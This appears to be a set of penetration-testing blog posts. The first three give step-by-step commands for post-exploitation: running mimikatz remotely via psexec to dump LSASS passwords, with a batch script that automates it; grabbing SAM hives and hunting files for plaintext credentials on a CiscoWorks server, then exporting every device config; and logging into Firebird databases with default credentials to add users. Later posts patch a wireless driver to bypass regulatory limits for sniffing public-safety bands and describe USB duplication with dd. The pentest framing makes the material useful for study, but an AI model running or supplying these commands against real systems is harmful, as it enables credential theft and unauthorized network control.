Running Remotely (Windows 2003 – 32-bit)


Running mimikatz remotely is more or less the same, but you'll need to establish a connection to the system first. We'll do that here by using the built-in Windows net commands and psexec.

We'll need to map the target remotely in order to copy over sekurlsa.dll. First we'll establish a connection to the server's admin$ share. Note that this will require pre-existing access to the server, so you'll need a valid credential to map the share:
net use \\169.254.73.91\admin$ /u:169.254.73.91\mimidemo


Then just copy over sekurlsa.dll:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools> copy ..\Win32\sekurlsa.dll \\169.254.73.91\admin$\system32  



Finally, we'll use psexec to run mimikatz:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz #


Now at our mimikatz prompt, we can just do the same as if we were running it locally:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz



mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK



mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS



mimikatz # @getLogonPasswords

--SNIP--

Authentification Id : 0;184995
Package d'authentification : NTLM
Utilisateur principal : PowerAccnt
Domaine d'authentification : SWITCH
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 37**********************89 }
wdigest : j************************\ <- Service account with Admin Privileges and suuuper long password - Ouch


Authentification Id : 0;62703
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : SWITCH
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 4***************************d }
wdigest : ******************** <- Admin account with suuuper long password - Ouch

--SNIP--

mimikatz # exit
Fermeture du canal de communication




Cleanup


To delete sekurlsa.dll from the remote system:
del \\169.254.73.91\admin$\system32\sekurlsa.dll


Then just double check it's not there with:
dir \\169.254.73.91\admin$\system32\sekurlsa.dll
Volume in drive \\169.254.73.91\admin$ has no label.
Volume Serial Number is 34C7-0000

Directory of \\169.254.73.91\admin$\system32

File Not Found



Finally, we can remove our connection to the server:
net use \\169.254.73.91\admin$ /del
\\169.254.73.91\admin$ was deleted successfully.
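
If you end up doing this against more than one host, the remote steps above can be strung together in a small batch file. A hypothetical sketch that simply repeats the commands used in this post (the target IP and admin account become parameters; it assumes you run it from the mimikatz_trunk directory):

@echo off
REM remote-mimikatz.bat TARGET-IP ADMIN-ACCOUNT
REM Maps admin$, copies the DLL, runs mimikatz via psexec, then cleans up.
set TARGET=%1
net use \\%TARGET%\admin$ /u:%2
copy Win32\sekurlsa.dll \\%TARGET%\admin$\system32
PsExec.exe /accepteula \\%TARGET% -c Win32\mimikatz.exe
del \\%TARGET%\admin$\system32\sekurlsa.dll
net use \\%TARGET%\admin$ /del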



Final Thoughts

Insanely awesome tool--huge thanks to the author for sharing! This capability can be instrumental in leveraging password reuse. This makes another tool to add to the security toolbox for sure. Also note that Hernan Ochoa added this capability to Windows Credential Editor version 1.3 Beta using the "-w" flag.

Got some tips of your own? Let us know in the comments below!!!


Hack Tips: CiscoWorks Exploitation

By Tony Lee.

This article is the third in a series (See Hack Tips: Blackberry Enterprise Server and Hack Tips: Good For Enterprise) covering, step-by-step, practical post-exploitation tips that can be used to get the most out of various common network servers. This week’s victim is CiscoWorks. Compromising this server allows the attacker to remotely control network devices and dump all device configurations.

Even though CiscoWorks is End of Life (EOL)--replaced by Cisco Prime Infrastructure (CPI)--we still see this management product present in many environments; thus it is still useful to know how to get the goods from Works.

Overview

Overall, the process involves the following steps:
  1. Identifying a CiscoWorks Server
  2. Obtaining CiscoWorks Administrator Credentials
  3. Interfacing with the CiscoWorks Web Interface
  4. Interfacing with the CiscoWorks Command Line Interface
  5. Dumping configs from CiscoWorks


Identifying The Host

  1. Host naming scheme
    • \\CiscoWorksBox
    • \\CISCOWKS
    • \\NETMNG
  2. Application Directory
    • C:\Program Files (x86)\CSCOpx
  3. User accounts
    • casuser (CiscoWorks anonymous access user)

      C:\ >net user

      User accounts for \\CiscoWorksDemoBox

      ----------------------------------------------------------
      casuser user user2
      user3
      The command completed successfully.

  4. Services
    • These Windows services are started:

      C:\>net start

      --SNIP--
      CiscoWorks ANI database engine
      CiscoWorks Daemon Manager
      CiscoWorks RME NG database engine
      CiscoWorks Tomcat Servlet Engine
      CiscoWorks Web Server


Identifying Ciscoworks Account Credentials

  1. Dump the local Windows password hashes and crack them (a quick sketch of grabbing the hives for offline cracking is shown after this list)
  2. Data mine the CiscoWorks box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful; network engineers are usually responsible for managing CiscoWorks and they are notorious for being security ignorant. We recently found a test .bat file that used ut.exe (a CiscoWorks tool) and disclosed the CiscoWorks credentials in plain-text.
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*
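For step 1, here's a minimal sketch of grabbing the SAM and SYSTEM hives for offline hash extraction and cracking. This assumes you already have an administrative shell on the box; the output paths are arbitrary, and any offline extractor/cracker of your choice can then be pointed at the saved hives:

 C:\>reg save HKLM\SAM C:\Windows\Temp\sam.save
The operation completed successfully.

 C:\>reg save HKLM\SYSTEM C:\Windows\Temp\system.save
The operation completed successfully.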


Interacting with Ciscoworks

Next we'll take a look at how we can interact with CiscoWorks and pull data from it.

Using the Ciscoworks Web Interface


CiscoWorks interface and options post-authentication

Source: http://www.netadmin.calpoly.edu/tools/cv-images/homepage.jpg

Surf to either of the URLs below for nice screenshots and great summarizations
  • http://hostname:1741
  • https://hostname

From the local system, you can confirm Ciscoworks is listening by checking for a listener on TCP 1741, or TCP 443:

C:\> netstat -ano | findstr 1741
TCP 0.0.0.0:1741 0.0.0.0:0 LISTENING 5136

C:\> netstat -ano | findstr 443
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 5136


Using the Ciscoworks Command line Application

The CiscoWorks command line application (cwcli.exe) has tons of options, including remotely running commands on devices! This could be very useful for an attacker; just use it with caution, because it could really get you into trouble if you don't know what you're doing!

Running cwcli.exe is more or less straightforward, but you'll definitely want to check out the -help output for all of the features.


C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
------------------------------------
CiscoWorks command line Application.
------------------------------------
General syntax to run a command with arguments is
cwcli

For detailed help on a command and it's arguments, run
cwcli -help

Dumping Device Configs from CiscoWorks

One noteworthy feature of cwcli.exe is its ability to dump device configurations from the command line! If you had an unlimited amount of time, you could obtain every config from every device on the network. Here's how to tell cwcli.exe to grab those configs.


C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u -p -device %

SUMMARY
========
Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig


The % character is a wildcard when using cwcli.exe. Using this, you could potentially dump all configurations from all CiscoWorks-managed devices! Just note that this could take a really long time on a large network. Also, it's probably worthwhile to note that as a general best practice, system administrators should never use the -p option and specify the password on the command line -- this includes within scripts.

And just to confirm we dumped some configurations:

C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011 06:40 PM <DIR> .
12/25/2011 06:40 PM <DIR> ..
12/25/2011 06:40 PM 26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011 06:40 PM 26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011 06:40 PM 30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011 06:40 PM 27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011 06:40 PM 30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011 06:40 PM 30,833 2011-11-09-06-40-31-247-devicename.xml
6 File(s) 173,101 bytes
2 Dir(s) 129,615,876,096 bytes free



Enjoy!


Fun with Firebird Database Default Credentials

by Tony Lee.

I have had a few internal network penetration tests now in which I came across the following finding identified by McAfee Vulnerability Manager (MVM): "Firebird SQL Default Credentials Detected". So I figured I'd share with you what is required to interact with the database and provide you with ideas on what you can do after you connect. Tune in for a future article on more fun with Firebird.

What is the Firebird Database?

“Firebird is a relational SQL database offering many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names (the most famous being "InterBase") since 1981.

In 2000, Borland decided to release InterBase 6.0 as Open Source. Firebird is an independent development, beginning with these sources, driven by an Open Source Community and funded by the Firebird Foundation.”

--Source: http://www.destructor.de/firebird/index.htm

Identifying Firebird Databases

Vulnerability scanners

Perhaps the easiest method to find Firebird databases is by using a vulnerability scanner. MVM and Nessus will also let you know if the database is configured with default credentials. Here are the findings from MVM and Nessus:
  • McAfee Vulnerability Manager (MVM): Firebird SQL Default Credentials Detected
  • Nessus: Firebird Default Credentials

Port scan

You can use any port scanner to check for TCP port 3050. Note that this is just the default port and can always be changed by the admin. A simple port scan to find it would be:
 root@bt:~# nmap -sS -T4 -PN -p 3050 192.168.1.0/24


Firebird Database Tools

There are plenty of tools to interact with Firebird. Most commonly, they can be grouped into either clients or database management tools. We'll look at one of each.

FlameRobin (Client)

"FlameRobin is a database administration tool for Firebird RDBMS. Their goal is to build a tool that is:
  • lightweight (small footprint, fast execution)
  • cross-platform (Linux, Windows, Mac OS X, FreeBSD, Solaris)
  • dependent only on other Open Source software"

--Source: http://www.flamerobin.org/

It is easily installed on BackTrack (or other distros that utilize apt):
 root@bt:~# apt-get install flamerobin


To run, launch X windows and type:
 root@bt:~# flamerobin


You may get the following error message; ignore it and continue:
 root@bt:~# The configuration file:
/root/.flamerobin/fr_databases.conf does not exist or cannot be opened.
This is normal for first time users. You may now register new servers and databases.


gsec (DB MGMT Tool)

This is the official tool to interact locally with the Firebird database. gsec is a command line utility used to connect to the security.fdb in order to manage users. This tool must be run on the database server itself as it has no parameter to be run remotely; however, this could be combined with psexec for remote execution if you had sufficient OS credentials.

Interrogating the Database

With access to the database, you can do any number of tasks. We'll look at a couple to get you started.

Retrieve Remote Server Version

Using FlameRobin, first “register” the remote server so you are able to communicate with it. Open the FlameRobin GUI, then go to Server -> Register Server -> and enter the following:
  • Display name: Friendly name to call the host, I use the IP
  • Hostname: Hostname or IP address
  • Port Number: usually 3050; however, this instance is running on another port.


Registering the Server so we can communicate with it


Next, right-click on the server that you just registered, choose "Retrieve server version" and provide your credentials. The default Firebird username and password are usually:

Username: SYSDBA
Password: masterkey



You should be provided the version number as shown below:



Adding/Changing Users

Another useful task is to add or change user accounts. An interesting piece of information is that the Firebird database does not check any characters beyond 8 in a password. Thus the masterkey default password might as well be “masterke” as the ‘y’ at the end is never checked because it is beyond 8 characters. Additionally, usernames are not case sensitive, however passwords are CaSe SeNsItIvE.
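If you want to see this truncation for yourself, one quick way is to try connecting with the last character of the password chopped off using the isql client that ships with Firebird. The host, database path, and binary name (isql vs. isql-fb on Debian-based distros) below are assumptions - adjust them for your target:

 root@bt:~# isql-fb
SQL> connect "192.168.1.50:/var/lib/firebird/2.5/data/example.fdb" user 'SYSDBA' password 'masterke';
SQL> quit;

If the connection succeeds with 'masterke', the server really is ignoring everything past the eighth character.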

With FlameRobin

Use the instructions above in the “Retrieve Remote Server Version” section in order to register the remote server if you have not done so already. Then right-click on the server that you just registered, select "Manage Users" and enter the SYSDBA credentials if they are not saved from the remote version enumeration above.



To add a user, just click "Add User" and provide the required information! To modify other users (including changing their passwords), click on the “details” icon, which looks like a magnifying glass over a piece of paper.

With gsec

Since gsec is a command line utility used to connect to the security.fdb in order to manage users, it must be run on the database server itself as it has no parameter to be run remotely. However, this could be combined with psexec for remote execution if you have sufficient OS credentials.
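As a rough sketch of that PsExec approach (the target IP, OS credentials, and Firebird install path below are all assumptions - adjust them for your environment):

 C:\>PsExec.exe /accepteula \\192.168.1.50 -u TARGETDOMAIN\Administrator -p P@ssw0rd "C:\Program Files\Firebird\Firebird_2_5\bin\gsec.exe" -user sysdba -pass masterkey -display

This simply runs gsec locally on the database server and streams the output back to you.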

Common command line options:
  -di[splay]                  Display all rows from security.fdb
  -di[splay] name             Display information only for user name
  -a[dd] name -pw password    Add a user named name with a password of password
  -mo[dify] name [options]    Modify the account name, optionally as specified by options
  -de[lete] name              Delete user name from security.fdb
  -h[elp] or ?                Display gsec commands and syntax


To add a "Tony" user with the password of "S3kR3tP4$$":
 gsec -user sysdba -pass masterkey -add Tony -pw S3kR3tP4$$


To modify users, define the username and password used to connect to the database with "-user" and "-pass", then use the "-mo" parameter to define the user account and "-pw" to define the new password.
 gsec -user sysdba -pass masterkey -mo  -pw 


Mitigation

The easiest way to help protect yourself is to change the default password to something complicated! Go to a command shell, cd to the Firebird bin subdirectory and issue the following command to change the password:
 gsec -user sysdba -pass masterkey -mo sysdba -pw 


Notice that you specify “sysdba” twice in the command:

With the -user parameter you identify yourself as SYSDBA. You also provide SYSDBA's current password in the -pass parameter. The -mo[dify] parameter tells gsec that you want to modify an account – which happens to be SYSDBA again. Lastly, -pw specifies the type of modification: the password. --Source: http://www.firebirdsql.org/manual/qsg2-config.html

More Info



Run across this in your own adventures? Tell us about it in the comments below!

Sniffing on the 4.9GHz Public Safety Spectrum

By Brad Antoniewicz.

Probably the most important thing to mention about the 4.9GHz spectrum is that you need a license to operate in it! If you don't have a license (I'm pretty sure you don't) - IT MAY BE ILLEGAL TO INTERACT WITH THIS BAND.

You've been warned - That all being said, let's talk about public safety.

What is the Public Safety Spectrum?

The Public Safety Spectrum is the name for a number of reserved ranges in radio spectrum allocated by the FCC and dedicated for the "sole or principal purpose of protecting the safety of life, health, or property". Basically it's used for police, ambulance, fire, and in some cases, utilities to communicate.

The 4.9GHz Public Safety Spectrum (4.940GHz to 4.990GHz) is one of these reserved public safety ranges. It's mainly for short distance, almost line of sight, communications. It's used for everything from creating "on the scene" networks so that the police and other responders can share and transfer data, to video camera systems around a fixed location.

The neat thing about the 4.9GHz spectrum is that the pretty much de-facto standard used in it is IEEE 802.11! It takes some deviations from the standard, such as allowing for 1MHz, 5MHz, 10MHz or 20MHz channels, but other than that, it is plain old 802.11 on a different spectrum.

Interacting with the Spectrum

To interact with the spectrum, you'll need an FCC LICENSE (!! if you skipped to this part, please see the first paragraph), and an adapter that is capable of transmitting/receiving on the 4.9GHz spectrum. There are some adapters already out there, such as the Ubiquiti SuperRange 4 Cardbus (SR4C), but no one likes spending more money if they don't have to!

A 4.9GHz adapter you might already have in your possession and not even know it is the Ubiquiti SuperRange Cardbus (SRC or SRC300)! The internal Atheros chipset actually supports from 4.910GHz to 6.1GHz! That's much more than originally advertised :)

The problem, though, is that if you want to use the cards with any of the standard Linux tools, you're more or less screwed! The current ath5k drivers don't officially support 4.9GHz. There are a couple of patches for older versions of the driver, but some don't work or can't be applied to the current stable driver release. Another issue is that some drivers don't support the 5MHz, 10MHz or 20MHz channel widths.

About the 4.9GHz Driver Patch

I took some time out and wrote up a quick patch for the current version of compat-wireless. I used some of the patches mentioned above as a starting point, and then followed the code comments in the existing drivers to implement the channel widths correctly.

Enabling 4.9GHz


To enable the extended frequency ranges, I just modified the driver to accept frequencies as low as 4.910GHz. There was an "ath_is_49ghz_allowed()" function that defined if the regulatory domain was allowed to access that range. I modified this function to always return true. The regulatory domain is often stored within your card's EEPROM and defines what region the card will be operating in. The mac80211 drivers query this value to determine what frequencies you're allowed to use. Based on that value, the driver will either consult its internal (statically defined) regulatory database, or if present, the Central Regulatory Domain Agent (CRDA). The CRDA is a user land agent that defines what frequencies are used within a region. The idea is that if you're in a different regulatory domain than the one your card is registered for, you can dynamically change the allowed frequencies without making any driver changes. You would do this with the "iw" command:
 root@bt:~# iw reg set <VALUE>


One problem I came across is that the driver won't consistently respect a regulatory domain that is defined this way. For example, if my card's EEPROM is set for US, but I set the World regulatory domain ("00"), sometimes it won't actually apply it or won't allow me to use the channels enabled by the extended regulatory domain. Because of this, I took the somewhat brutish approach of just returning true for "ath_is_49ghz_allowed()".
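If you want to see which regulatory domain the kernel actually ended up applying after an "iw reg set", you can query it - just a sanity check, not part of the patch itself:

 root@bt:~# iw reg get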

I really wanted to make this patch work with the smallest number of module changes, because the more complicated the module change, the more likely it will break in future releases. Plus, most of the code to support 4.9GHz was already there!

Rather than setting the 4.9GHz channels, etc.. statically within the driver, I also decided to leverage the CRDA, since it can be changed without needing the driver to be rebuilt.

Channel Widths


By default the compat-wireless drivers support 20MHz channel widths. Because 4.9GHz can have 1MHz, 5MHz, 10MHz, or 20MHz channels, the driver needed to be modified to support this. Luckily the driver code comments spell out what needs to be done, and much of the support already existed - it just wasn't used. I modified the drivers as per the code comments, and took a tip from the RADAR patch by adding the "default_bwmode" module parameter so that people can specify the channel width when they load the module.

Installation

Installing the patch is easy. Since I use non-persistent BackTrack for everything, I'll provide instructions using that as a base. You can either perform the installation manually or the "easy way" which is using a script I created.

Download

You should really read on, but if you're impatient and just want stuff to download, here is the download link:

The Easy Way

If you'd like to use this method, you'll just need internet access. Also, once you complete the "easy" way, you can use that directory for an offline installation later on. To install, make sure you have internet access and:
 root@bt:~# git clone https://github.com/OpenSecurityResearch/public-safety
root@bt:~# cd public-safety/4.9ghz/
root@bt:~/public-safety/4.9ghz# chmod +x 49ghz_install.sh
root@bt:~/public-safety/4.9ghz# ./49ghz_install.sh


That should be it (told you it was easy)! It'll auto-create a monitor mode VAP using 10MHz wide channels.
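To double-check that the script created the monitor mode VAP and that the card tunes into the band, something along these lines should do (interface names may differ on your system):

 root@bt:~# iw dev
root@bt:~# iwconfig mon0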

Manual Installation

Manual installation is pretty simple too, but some people hate typing :) To install everything from scratch, first install all the prerequisites:
 root@bt:~# apt-get install libnl-dev libssl-dev python-m2crypto build-essential 


Next, we'll need to set up CRDA. The CRDA consults a database for its regulatory information. This database is called the wireless-regdb. You'll also need to sign the database, so let's create some keys to do that:
 root@bt:~# openssl genrsa -out key_for_regdb.priv.pem 2048 
root@bt:~# openssl rsa -in key_for_regdb.priv.pem -out key_for_regdb.pub.pem -pubout -outform PEM


Now, we'll download wireless-regdb, extract it, and build:
 root@bt:~# wget http://linuxwireless.org/download/wireless-regdb/wireless-regdb-2011.04.28.tar.bz2
root@bt:~# tar -jxf wireless-regdb-2011.04.28.tar.bz2
root@bt:~# cd wireless-regdb-2011.04.28
root@bt:~/wireless-regdb-2011.04.28# make


The regulatory database is just a plain-text file that is then converted to the format CRDA expects. You can modify your database any way you'd like, or you can just use the one I created (db-ReturnTrue.txt):
 root@bt:~/wireless-regdb-2011.04.28# wget https://raw.github.com/OpenSecurityResearch/public-safety/master/4.9ghz/db-ReturnTrue.txt
root@bt:~/wireless-regdb-2011.04.28# cp db-ReturnTrue.txt db.txt
root@bt:~/wireless-regdb-2011.04.28# ./db2bin.py regulatory.bin db.txt ../key_for_regdb.priv.pem
root@bt:~/wireless-regdb-2011.04.28# make install


Now that our regulatory database is all set up, let's install CRDA to leverage it. Notice that after we download and extract, we also copy over our public keys to the locations CRDA is expecting them to be. This is so it can validate the authenticity of the regulatory database we created.
 root@bt:~# wget http://linuxwireless.org/download/crda/crda-1.1.2.tar.bz2
root@bt:~# tar -jxf crda-1.1.2.tar.bz2
root@bt:~# cd crda-1.1.2
root@bt:~/crda-1.1.2# cp ../key_for_regdb.pub.pem pubkeys/
root@bt:~/crda-1.1.2# cp ../key_for_regdb.pub.pem /usr/lib/crda/pubkeys
root@bt:~/crda-1.1.2# make
root@bt:~/crda-1.1.2# make install


So now we can get to the compat-wireless installation. First download it, then extract:
 root@bt:~#  wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.3/compat-wireless-3.3-1.tar.bz2
root@bt:~# tar -jxf compat-wireless-3.3-1.tar.bz2
root@bt:~# ln -s /usr/src/linux /lib/modules/`uname -r`/build
root@bt:~# cd compat-wireless-3.3-1


Next we'll unload any conflicting drivers (I'm being a little redundant with these two commands, I know):
 root@bt:~/compat-wireless-3.3-1# sudo scripts/wlunload.sh
root@bt:~/compat-wireless-3.3-1# sudo modprobe -r b43 ath5k ath iwlwifi iwlagn mac80211 cfg80211


And then tell compat-wireless to just compile ath5k:
 root@bt:~/compat-wireless-3.3-1# scripts/driver-select ath5k


Now we'll download the default set of patches for BT5R2 and apply them (you may get some errors when applying; you should be able to ignore them):
 root@bt:~/compat-wireless-3.3-1# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~/compat-wireless-3.3-1# tar -xf 2.6.39.patches.tar
root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/mac80211.compat08082009.wl_frag+ack_v1.patch
root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/zd1211rw-2.6.28.patch
root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/ipw2200-inject.2.6.36.patch


Then let's apply the 4.9GHz patch:
 root@bt:~/compat-wireless-3.3-1# wget https://raw.github.com/OpenSecurityResearch/public-safety/master/4.9ghz/compat-wireless-3.3-1_ath5k-49GHZ+BWMODE.patch
root@bt:~/compat-wireless-3.3-1# patch -p1 < compat-wireless-3.3-1_ath5k-49GHZ+BWMODE.patch


OK! Now we're ready to build:
 root@bt:~/compat-wireless-3.3-1# make
root@bt:~/compat-wireless-3.3-1# make install
root@bt:~/compat-wireless-3.3-1# cd ..


After this, we're more or less finished. You'll probably also want to upgrade your Kismet to find these networks. It's highly recommended that you use the latest version of Kismet from the git repo.

Updating Kismet

If you followed the easy way above, then you should be already updated. If you're following the manual way, uninstall the installed version of kismet:
 root@bt:~# dpkg -r kismet


Then grab the latest development version of kismet and compile it:
 root@bt:~# git clone https://www.kismetwireless.net/kismet.git
root@bt:~# cd kismet
root@bt:~/kismet# ./configure
root@bt:~/kismet# make dep
root@bt:~/kismet# make
root@bt:~/kismet# make install


You'll also need to define a new channel list in your kismet.conf to support this. I've added the following. I chose to use .5MHz channel spacing since many 4.9GHz deployments have varying channel layouts.
 channellist=ps5mhz:4920-4990-5-.5
channellist=ps10mhz:4920-4990-10-.5
channellist=ps20mhz:4920-4990-20-.5


Finally, to change to a different channel width (other than 20MHz) you'll need to define the "default_bwmode" module parameter. For 5MHz channels, define "default_bwmode=1", for 10MHz, "default_bwmode=2", and for 40MHz, "default_bwmode=3". Also, for whatever reason, if you're using a channel width other than 20MHz, you'll also need to manually create a monitor mode VAP (e.g. "mon0") and use that as your source for kismet. Here's how to set it up:
 root@bt:~# modprobe ath5k default_bwmode=2
root@bt:~# iw dev wlan1 interface add mon0 type monitor
root@bt:~# ifconfig mon0 up
root@bt:~# iwconfig mon0 freq 4.920G


Is it Working?

Once everything is running, kismet should look normal, just with the previously undiscovered AP available! Note that this band is highly regulated in the US, so you won't see these networks everywhere. And since the transmit distance is so small, you'll likely need to be in near line of sight of the 4.9GHz network you're looking at. Here's a screen shot of kismet discovering our test AP (located in a faraday cage, in a country where it is legal to transmit on 4.9GHz, of course):


Want to learn more?

This article is a precursor to the talk Robert Portvliet and I will be giving this year at Defcon 20. So if this sparks your interest, stop by - we'll be talking about 4.9GHz and the other Public Safety Bands!

A Simple USB Thumb Drive Duplicator on the Cheap

By Tony Lee and Matt Kemelhar.

You may have had to shop for a USB duplicator for some reason or another and noticed that they can be quite expensive and the product reviews are not always very encouraging. At Foundstone, we teach a few classes that require each student to have the same Foundstone customized USB stick—thus we have a need for one of these expensive devices—especially when we need upwards of 100 sticks created in a weekend.

After scouring the web and reading reviews, we resorted to buying a duplicator that was around $300 and could duplicate 7 USB sticks at a time. Our first batch finished without a hitch - until we tried to boot off of them. It turns out this product cannot duplicate a bootable USB stick which we needed for a LIVE Linux distro. We contacted customer support and they even went as far as to rewrite the software to try to get it to do what we wanted—unfortunately, without any success.

When all hope was lost, we turned to some Linux dd foo. As it turns out, you don’t need the expensive hardware. All you need is a standard USB hub, dd, and some command line magic.

Overall, the process involves the following steps:
  1. Finding a good USB hub
  2. Getting a copy of dd
  3. Determining the drive mapping
  4. Executing the foo


Finding a good USB hub

Ironically, the very expensive “7-port USB duplicator” that we purchased last year served as our first USB hub; however, we later realized that ANY USB hub would work. If you are going to use an old hub you have laying around, you can skip this section. Otherwise, there are a few things you may want to consider if you are going to purchase a new hub:

Number of ports


This will vary depending on the size of your project. As stated earlier, we have to duplicate 100 or more USB sticks in a weekend, so for us… the more ports the better. The USB hub I purchased this year was simply a hub (and not a “duplicator”), but it has 7 ports.

U-Speed H7928-U3: 7-port USB 3.0 hub
Price: Less than $50 on amazon - much cheaper (1/6th) than our USB 2.0 7-port “duplicator”

USB hub speed


The duplicator we originally purchased was a USB 2.0 hub. However, I also used an old Belkin USB 1.1 4-port hub to successfully test duplication as well. This year, we went with a USB 3.0 hub to determine the performance increase—if any.



Spacing between ports


This is something you hopefully do not learn the hard way. When buying a USB hub, you have to keep in mind the bulkiness of the USB sticks you may have to duplicate. Take the image below for example with USB sticks of varying width. The Flash Voyager and the Verbatim stick (lower left) are wider than the Cruzer (lower right) and DataTraveler sticks (top right).



If the spacing between the ports on the hub is too close together and you happen to find a wider stick on-sale when you are buying, you will not be able to fit all of the sticks into the hub at the same time—thus involuntarily reducing your 7 usable ports down to 4.

We took this into consideration when we purchased the USB 3.0 USpeed hub mentioned above. As you can see in the image below there is plenty of space between the ports which accommodates the wider/bulkier USB sticks that may be on-sale.


Source: Amazon product page


An example of a hub that has ports that are too close together was the old USB 1.1 4-port Belkin I had laying around the house:


Source: Belkin F5U021 product page


Power requirements


This is not too much of an issue, but it is something to keep in mind. Most of the USB hubs can be powered off of the USB port itself or an external power source. When you are duplicating many sticks at the same time, you may want to plug in to a wall socket—even if you think you can power the hub via USB. The power source can sometimes affect speed and reliability of the copies.

Reviews


One of the deciding factors in our most recent purchase was the positive remarks about the hub (beware of shills!). We recommend choosing a hub that is industry proven and popular for speed, features, and reliability.

Lights on each port


This may seem like a minor and nitpicky feature, however having lights on the individual ports is often helpful to ensure:
  1. The USB port is functioning
  2. The USB stick is functioning
  3. The USB stick is seated properly
  4. Data is being written to the stick

Getting a copy of dd

dd is an old school *nix command that does low-level bit for bit copying. It is a very versatile and easy to use tool. Common uses are acquiring a forensic image of media, creating backup images (ISO’s) of CD’s or DVD’s, performing drive backups and now, duplicating USB sticks.
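If you have never used it before, a basic one-to-one copy looks something like this (the device and file names are just examples - triple-check them before running, since dd will happily overwrite the wrong disk):

 root@box:~# dd if=/dev/cdrom of=backup.iso            # image a CD/DVD to an ISO
root@box:~# dd if=/dev/sdb of=/dev/sdc bs=16M         # clone one stick onto another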

There are ports of dd for Windows, but many of them have some limitation—thus we prefer to use dd natively in *nix. Ironically, since we are duplicating bootable Linux distributions, we use one of the USB sticks that we manually created in order to boot to that and make the others. We create two USB sticks the manual way (one to boot from and one to copy).

Determining the drive mapping

Depending on the operating system, the USB sticks may be auto-mounted. It is important that you unmount the drives before starting the duplication process. There are several ways in which you can determine how the USB sticks were mounted and how to address them.
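As a quick sketch, checking for and removing any auto-mounts before you start copying might look like this (the device and mount point names are examples):

 root@box:~# mount | grep /dev/sd
/dev/sdb1 on /media/usb0 type vfat (rw)
root@box:~# umount /dev/sdb1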

Monitoring /var/log/messages


For real time detection, just use tail:
root@box:~# tail -f /var/log/messages
Jul 1 16:16:59 DVORAK kernel: [174268.742086] usb 1-1: new high-speed USB device number 5 using ehci_hcd
Jul 1 16:17:00 DVORAK kernel: [174269.149525] scsi6 : usb-storage 1-1:1.0
Jul 1 16:17:01 DVORAK kernel: [174270.252811] scsi 6:0:0:0: Direct-Access Kingston DataTraveler G3 PMAP PQ: 0 ANSI: 0 CCS
Jul 1 16:17:01 DVORAK kernel: [174270.260034] sd 6:0:0:0: Attached scsi generic sg2 type 0
Jul 1 16:17:01 DVORAK kernel: [174270.779011] sd 6:0:0:0: [sdb] 7826688 512-byte logical blocks: (4.00 GB/3.73 GiB)
Jul 1 16:17:01 DVORAK kernel: [174270.786126] sd 6:0:0:0: [sdb] Write Protect is off
Jul 1 16:17:02 DVORAK kernel: [174270.834954] sdb: sdb1
Jul 1 16:17:02 DVORAK kernel: [174270.860634] sd 6:0:0:0: [sdb] Attached SCSI removable disk




dmesg - print or control kernel messages


For a running history, you can use “dmesg | less” and then hit ‘G’ to go to the bottom and find your USB sticks. You will find something like the following indicating that the operating system has detected and labeled the device /dev/sdb:
[  981.231497] Initializing USB Mass Storage driver...
[ 981.231586] scsi3 : usb-storage 1-1:1.0
[ 981.231792] usbcore: registered new interface driver usb-storage
[ 981.231794] USB Mass Storage support registered.
[ 982.235921] scsi 3:0:0:0: Direct-Access Kingston DataTraveler G3 PMAP PQ: 0 ANSI: 0 CCS
[ 982.238374] sd 3:0:0:0: Attached scsi generic sg2 type 0
[ 982.248017] sd 3:0:0:0: [sdb] 7826688 512-byte logical blocks: (4.00 GB/3.73 GiB)
[ 982.252239] sd 3:0:0:0: [sdb] Write Protect is off
[ 982.252243] sd 3:0:0:0: [sdb] Mode Sense: 23 00 00 00
[ 982.256745] sd 3:0:0:0: [sdb] No Caching mode page present
